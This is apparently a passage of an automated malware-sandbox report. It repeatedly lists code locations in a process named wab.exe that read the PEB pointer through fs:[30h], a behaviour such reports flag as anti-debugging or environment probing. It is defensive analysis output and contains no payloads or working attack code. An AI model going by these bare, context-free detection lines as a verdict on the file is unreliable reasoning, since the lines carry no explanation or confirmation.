            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361C156 mov eax, dword ptr fs:[00000030h]4_2_0361C156
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F5152 mov eax, dword ptr fs:[00000030h]4_2_036F5152
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03650124 mov eax, dword ptr fs:[00000030h]4_2_03650124
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03621131 mov eax, dword ptr fs:[00000030h]4_2_03621131
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03621131 mov eax, dword ptr fs:[00000030h]4_2_03621131
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B136 mov eax, dword ptr fs:[00000030h]4_2_0361B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B136 mov eax, dword ptr fs:[00000030h]4_2_0361B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B136 mov eax, dword ptr fs:[00000030h]4_2_0361B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B136 mov eax, dword ptr fs:[00000030h]4_2_0361B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036CA118 mov ecx, dword ptr fs:[00000030h]4_2_036CA118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036CA118 mov eax, dword ptr fs:[00000030h]4_2_036CA118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036CA118 mov eax, dword ptr fs:[00000030h]4_2_036CA118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036CA118 mov eax, dword ptr fs:[00000030h]4_2_036CA118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E0115 mov eax, dword ptr fs:[00000030h]4_2_036E0115
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F61E5 mov eax, dword ptr fs:[00000030h]4_2_036F61E5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036251ED mov eax, dword ptr fs:[00000030h]4_2_036251ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036C71F9 mov esi, dword ptr fs:[00000030h]4_2_036C71F9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036501F8 mov eax, dword ptr fs:[00000030h]4_2_036501F8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F51CB mov eax, dword ptr fs:[00000030h]4_2_036F51CB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E61C3 mov eax, dword ptr fs:[00000030h]4_2_036E61C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E61C3 mov eax, dword ptr fs:[00000030h]4_2_036E61C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365D1D0 mov eax, dword ptr fs:[00000030h]4_2_0365D1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365D1D0 mov ecx, dword ptr fs:[00000030h]4_2_0365D1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E1D0 mov eax, dword ptr fs:[00000030h]4_2_0369E1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E1D0 mov eax, dword ptr fs:[00000030h]4_2_0369E1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0369E1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E1D0 mov eax, dword ptr fs:[00000030h]4_2_0369E1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E1D0 mov eax, dword ptr fs:[00000030h]4_2_0369E1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D11A4 mov eax, dword ptr fs:[00000030h]4_2_036D11A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D11A4 mov eax, dword ptr fs:[00000030h]4_2_036D11A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D11A4 mov eax, dword ptr fs:[00000030h]4_2_036D11A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D11A4 mov eax, dword ptr fs:[00000030h]4_2_036D11A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363B1B0 mov eax, dword ptr fs:[00000030h]4_2_0363B1B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03660185 mov eax, dword ptr fs:[00000030h]4_2_03660185
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DC188 mov eax, dword ptr fs:[00000030h]4_2_036DC188
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DC188 mov eax, dword ptr fs:[00000030h]4_2_036DC188
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A019F mov eax, dword ptr fs:[00000030h]4_2_036A019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A019F mov eax, dword ptr fs:[00000030h]4_2_036A019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A019F mov eax, dword ptr fs:[00000030h]4_2_036A019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A019F mov eax, dword ptr fs:[00000030h]4_2_036A019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361A197 mov eax, dword ptr fs:[00000030h]4_2_0361A197
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361A197 mov eax, dword ptr fs:[00000030h]4_2_0361A197
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361A197 mov eax, dword ptr fs:[00000030h]4_2_0361A197
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03677190 mov eax, dword ptr fs:[00000030h]4_2_03677190
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A106E mov eax, dword ptr fs:[00000030h]4_2_036A106E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F5060 mov eax, dword ptr fs:[00000030h]4_2_036F5060
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov ecx, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364C073 mov eax, dword ptr fs:[00000030h]4_2_0364C073
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369D070 mov ecx, dword ptr fs:[00000030h]4_2_0369D070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03622050 mov eax, dword ptr fs:[00000030h]4_2_03622050
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036C705E mov ebx, dword ptr fs:[00000030h]4_2_036C705E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036C705E mov eax, dword ptr fs:[00000030h]4_2_036C705E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B052 mov eax, dword ptr fs:[00000030h]4_2_0364B052
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A6050 mov eax, dword ptr fs:[00000030h]4_2_036A6050
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361A020 mov eax, dword ptr fs:[00000030h]4_2_0361A020
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361C020 mov eax, dword ptr fs:[00000030h]4_2_0361C020
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E903E mov eax, dword ptr fs:[00000030h]4_2_036E903E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E903E mov eax, dword ptr fs:[00000030h]4_2_036E903E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E903E mov eax, dword ptr fs:[00000030h]4_2_036E903E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E903E mov eax, dword ptr fs:[00000030h]4_2_036E903E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A4000 mov ecx, dword ptr fs:[00000030h]4_2_036A4000
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363E016 mov eax, dword ptr fs:[00000030h]4_2_0363E016
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363E016 mov eax, dword ptr fs:[00000030h]4_2_0363E016
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363E016 mov eax, dword ptr fs:[00000030h]4_2_0363E016
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363E016 mov eax, dword ptr fs:[00000030h]4_2_0363E016
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036450E4 mov eax, dword ptr fs:[00000030h]4_2_036450E4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036450E4 mov ecx, dword ptr fs:[00000030h]4_2_036450E4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0361A0E3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A60E0 mov eax, dword ptr fs:[00000030h]4_2_036A60E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036280E9 mov eax, dword ptr fs:[00000030h]4_2_036280E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361C0F0 mov eax, dword ptr fs:[00000030h]4_2_0361C0F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036620F0 mov ecx, dword ptr fs:[00000030h]4_2_036620F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov ecx, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov ecx, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov ecx, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov ecx, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C0 mov eax, dword ptr fs:[00000030h]4_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369D0C0 mov eax, dword ptr fs:[00000030h]4_2_0369D0C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369D0C0 mov eax, dword ptr fs:[00000030h]4_2_0369D0C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A20DE mov eax, dword ptr fs:[00000030h]4_2_036A20DE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F50D9 mov eax, dword ptr fs:[00000030h]4_2_036F50D9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036490DB mov eax, dword ptr fs:[00000030h]4_2_036490DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B80A8 mov eax, dword ptr fs:[00000030h]4_2_036B80A8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E60B8 mov eax, dword ptr fs:[00000030h]4_2_036E60B8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E60B8 mov ecx, dword ptr fs:[00000030h]4_2_036E60B8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362208A mov eax, dword ptr fs:[00000030h]4_2_0362208A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361D08D mov eax, dword ptr fs:[00000030h]4_2_0361D08D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03625096 mov eax, dword ptr fs:[00000030h]4_2_03625096
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364D090 mov eax, dword ptr fs:[00000030h]4_2_0364D090
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364D090 mov eax, dword ptr fs:[00000030h]4_2_0364D090
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365909C mov eax, dword ptr fs:[00000030h]4_2_0365909C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B765 mov eax, dword ptr fs:[00000030h]4_2_0361B765
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B765 mov eax, dword ptr fs:[00000030h]4_2_0361B765
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B765 mov eax, dword ptr fs:[00000030h]4_2_0361B765
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B765 mov eax, dword ptr fs:[00000030h]4_2_0361B765
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03628770 mov eax, dword ptr fs:[00000030h]4_2_03628770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630770 mov eax, dword ptr fs:[00000030h]4_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630770 mov eax, dword ptr fs:[00000030h]4_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630770 mov eax, dword ptr fs:[00000030h]4_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630770 mov eax, dword ptr fs:[00000030h]4_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630770 mov eax, dword ptr fs:[00000030h]4_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630770 mov eax, dword ptr fs:[00000030h]4_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630770 mov eax, dword ptr fs:[00000030h]4_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630770 mov eax, dword ptr fs:[00000030h]4_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630770 mov eax, dword ptr fs:[00000030h]4_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630770 mov eax, dword ptr fs:[00000030h]4_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630770 mov eax, dword ptr fs:[00000030h]4_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630770 mov eax, dword ptr fs:[00000030h]4_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03633740 mov eax, dword ptr fs:[00000030h]4_2_03633740
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03633740 mov eax, dword ptr fs:[00000030h]4_2_03633740
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03633740 mov eax, dword ptr fs:[00000030h]4_2_03633740
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F3749 mov eax, dword ptr fs:[00000030h]4_2_036F3749
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365674D mov esi, dword ptr fs:[00000030h]4_2_0365674D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365674D mov eax, dword ptr fs:[00000030h]4_2_0365674D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365674D mov eax, dword ptr fs:[00000030h]4_2_0365674D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03620750 mov eax, dword ptr fs:[00000030h]4_2_03620750
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662750 mov eax, dword ptr fs:[00000030h]4_2_03662750
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662750 mov eax, dword ptr fs:[00000030h]4_2_03662750
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A4755 mov eax, dword ptr fs:[00000030h]4_2_036A4755
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03623720 mov eax, dword ptr fs:[00000030h]4_2_03623720
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363F720 mov eax, dword ptr fs:[00000030h]4_2_0363F720
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363F720 mov eax, dword ptr fs:[00000030h]4_2_0363F720
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363F720 mov eax, dword ptr fs:[00000030h]4_2_0363F720
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DF72E mov eax, dword ptr fs:[00000030h]4_2_036DF72E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365C720 mov eax, dword ptr fs:[00000030h]4_2_0365C720
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365C720 mov eax, dword ptr fs:[00000030h]4_2_0365C720
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E972B mov eax, dword ptr fs:[00000030h]4_2_036E972B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619730 mov eax, dword ptr fs:[00000030h]4_2_03619730
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619730 mov eax, dword ptr fs:[00000030h]4_2_03619730
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03655734 mov eax, dword ptr fs:[00000030h]4_2_03655734
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036FB73C mov eax, dword ptr fs:[00000030h]4_2_036FB73C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036FB73C mov eax, dword ptr fs:[00000030h]4_2_036FB73C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036FB73C mov eax, dword ptr fs:[00000030h]4_2_036FB73C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036FB73C mov eax, dword ptr fs:[00000030h]4_2_036FB73C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362973A mov eax, dword ptr fs:[00000030h]4_2_0362973A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362973A mov eax, dword ptr fs:[00000030h]4_2_0362973A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365273C mov eax, dword ptr fs:[00000030h]4_2_0365273C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365273C mov ecx, dword ptr fs:[00000030h]4_2_0365273C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365273C mov eax, dword ptr fs:[00000030h]4_2_0365273C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369C730 mov eax, dword ptr fs:[00000030h]4_2_0369C730
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03625702 mov eax, dword ptr fs:[00000030h]4_2_03625702
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03625702 mov eax, dword ptr fs:[00000030h]4_2_03625702
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03627703 mov eax, dword ptr fs:[00000030h]4_2_03627703
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365C700 mov eax, dword ptr fs:[00000030h]4_2_0365C700
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03620710 mov eax, dword ptr fs:[00000030h]4_2_03620710
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03650710 mov eax, dword ptr fs:[00000030h]4_2_03650710
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365F71F mov eax, dword ptr fs:[00000030h]4_2_0365F71F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365F71F mov eax, dword ptr fs:[00000030h]4_2_0365F71F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362D7E0 mov ecx, dword ptr fs:[00000030h]4_2_0362D7E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036427ED mov eax, dword ptr fs:[00000030h]4_2_036427ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036427ED mov eax, dword ptr fs:[00000030h]4_2_036427ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036427ED mov eax, dword ptr fs:[00000030h]4_2_036427ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036217EC mov eax, dword ptr fs:[00000030h]4_2_036217EC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036217EC mov eax, dword ptr fs:[00000030h]4_2_036217EC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036217EC mov eax, dword ptr fs:[00000030h]4_2_036217EC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036247FB mov eax, dword ptr fs:[00000030h]4_2_036247FB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036247FB mov eax, dword ptr fs:[00000030h]4_2_036247FB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362C7C0 mov eax, dword ptr fs:[00000030h]4_2_0362C7C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036257C0 mov eax, dword ptr fs:[00000030h]4_2_036257C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036257C0 mov eax, dword ptr fs:[00000030h]4_2_036257C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036257C0 mov eax, dword ptr fs:[00000030h]4_2_036257C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A07C3 mov eax, dword ptr fs:[00000030h]4_2_036A07C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A97A9 mov eax, dword ptr fs:[00000030h]4_2_036A97A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036AF7AF mov eax, dword ptr fs:[00000030h]4_2_036AF7AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036AF7AF mov eax, dword ptr fs:[00000030h]4_2_036AF7AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036AF7AF mov eax, dword ptr fs:[00000030h]4_2_036AF7AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036AF7AF mov eax, dword ptr fs:[00000030h]4_2_036AF7AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036AF7AF mov eax, dword ptr fs:[00000030h]4_2_036AF7AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036207AF mov eax, dword ptr fs:[00000030h]4_2_036207AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364D7B0 mov eax, dword ptr fs:[00000030h]4_2_0364D7B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F37B6 mov eax, dword ptr fs:[00000030h]4_2_036F37B6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F7BA mov eax, dword ptr fs:[00000030h]4_2_0361F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F7BA mov eax, dword ptr fs:[00000030h]4_2_0361F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F7BA mov eax, dword ptr fs:[00000030h]4_2_0361F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F7BA mov eax, dword ptr fs:[00000030h]4_2_0361F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F7BA mov eax, dword ptr fs:[00000030h]4_2_0361F7BA
